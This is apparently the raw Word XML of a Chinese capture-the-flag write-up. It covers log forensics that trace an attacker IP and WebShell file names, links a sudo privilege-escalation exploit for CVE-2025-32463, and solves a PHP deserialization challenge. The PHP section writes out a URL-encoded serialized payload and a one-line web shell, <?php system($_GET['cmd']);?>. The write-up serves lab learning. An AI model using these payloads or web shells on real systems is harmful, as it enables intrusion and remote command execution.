          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EDD210">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40981F2F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val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日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA9340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2018-02-23 全天的大小变化：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D4E5F8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白天多次为正常大小 50428 字节，例如 logs/ex180223.log:6093 、 6184 、 6924 、 7269 、 7414 、 7705</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166F6FED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晚上开始出现异常大小 37756 字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1629CF18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</w:p>
    <w:p w14:paraId="4B5C7067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上传所用 IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25DF07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</w:p>
    <w:p w14:paraId="5519B894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当晚的攻击链关键片段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 183.62.9.42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BAF549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767840"/>
            <wp:effectExtent l="0" t="0" r="698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2964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</w:p>
    <w:p w14:paraId="50003918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WebShell 文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB2D50A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B38BB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2210435"/>
            <wp:effectExtent l="0" t="0" r="1079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6E9B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="154876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B610">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17CF4B3C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="22771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C351">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B3A3A49">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明显的 WebShell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7814EF09">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">21:02:20 table.jsp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446DE317">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21:04:26 en.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09861F33">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>21:04:39 2.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FB5E3A">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6491DE92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2584"/>
        </w:tabs>
        <w:bidi w:val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所以flag{2018-02-23/183.62.9.42/table.jsp-en.jsp-2.jsp}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4567D39F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59EB496C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40536894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079B4277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3A5CB675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721B4850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1396912A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716E1E45">
      <w:pPr>
        <w:jc w:val="center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一个提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EAD929"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0"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/kh4sh3i/CVE-2025-32463" </w:instrText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0"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CVE-2025-32463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0"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="551BC2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11CD0C2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"https://github.com/kh4sh3i/CVE-2025-32463"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https://github.com/kh4sh3i/CVE-2025-32463</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A55E8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14DCCE77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="267652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CDF1">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4603750" cy="285115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48CE"/>
    <w:p w14:paraId="1B4C556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CVE-2025-32463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是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Sudo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二进制中的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本地权限升级漏洞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。该漏洞允许本地用户通过特定错误配置或自定义输入升级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root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权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C9664F">
      <w:p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有幸做过这个提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DC3FAB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1751CE54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291B6D0A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3BB5261C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5F4BC05F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52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>马里奥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C60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最小化界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64051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鼠标右键在linux里面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B89B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Application &gt; shell &gt;bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A81A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A59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没有flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415CA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 / -name flag*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C939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有个flags </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38366687">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>最后有个victory就是flag</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1906905"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1079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8F36">
      <w:pPr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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6758F560">
      <w:pPr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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5185FD90">
      <w:pPr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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FBE2CFF">
      <w:pPr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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665F133A">
      <w:pPr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2"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>浅析PHP原生类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE3D874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lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39CDF6A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使用trae-ai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8B27B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 利用反序列化触发链：外层 install::__wakeup 会 echo "Hello,".$this-&gt;username ，如果 $username 是一个对象，PHP会对该对象做字符串化，触发该对象的 __toString 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31208B36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 让 $username 指向一个“嵌套的 install 对象”。当这个嵌套对象被字符串化时，会调用 install::__toString ，其中的 ($this-&gt;username)(); 会把其自身的 $username 当作可调用函数执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D366D02">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 选择零参数且会直接输出的内置函数作为可调用目标，例如 phpinfo() 。它会直接把环境变量等信息输出到页面，CTF里常把 flag 暴露在 phpinfo() 的输出（Environment/Variables/Additional info）中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527934FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 注意 PHP 私有属性在序列化里的键名是 \x00ClassName\x00property ，要用 NUL 字节（URL里编码为 %00 ），并且 s:&lt;len&gt;:"..." 的长度要按字节计算。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E65EF34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7950D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239C79E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data=O%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3Bs%3A7%3A%22phpinfo%22%3Bs%3A17%3A%22%00install%00password%22%3Bs%3A1%3A%22x%22%3B%7Ds%3A17%3A%22%00install%00password%22%3Bs%3A1%3A%22y%22%3B%7D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访问得到phpinfo页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BBB740">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1780540"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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1B11CE0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命中类后，用 payload 写入 &lt;?php system($_GET['cmd']);?&gt; 到 shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521F2AE3">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5254625" cy="805180"/>
            <wp:effectExtent l="0" t="0" r="3175" b="762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360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解码pad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DED843B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B53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Antsword链接，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEF4525">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E334F82">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A76A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791460"/>
            <wp:effectExtent l="0" t="0" r="5080" b="2540"/>
            <wp:docPr id="13" name="图片 4" descr="7568ebf0a71480e3f50acaa9609a7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7568ebf0a71480e3f50acaa9609a746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C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Flag在根目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED5183">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B2C489D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361D4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551555"/>
            <wp:effectExtent l="0" t="0" r="11430" b="4445"/>
            <wp:docPr id="11" name="图片 5" descr="ceef5c9b931ced40454e7aae72568b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ceef5c9b931ced40454e7aae72568b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4E16">
      <w:pPr>
        <w:jc w:val="both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93752"/>
    <w:rsid w:val="23030068"/>
    <w:rsid w:val="3E693752"/>
    <w:rsid w:val="6246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2108</Words>
  <Characters>11574</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>2</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>21902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2025-11-24T13:19:00Z</dcterms:created>
  <dc:creator>X</dc:creator>
  <cp:lastModifiedBy>X</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T14:36:01Z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866EA638FF6E42FC936DC3241F8C9695_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZGQ2MGU4MWU4MTQyOTVhNzE3MGVhZmJlZDI3OTNiODAiLCJ1c2VySWQiOiIxMjMwODgwNTczIn0=</vt:lpwstr>
  </property>
</Properties>
</file>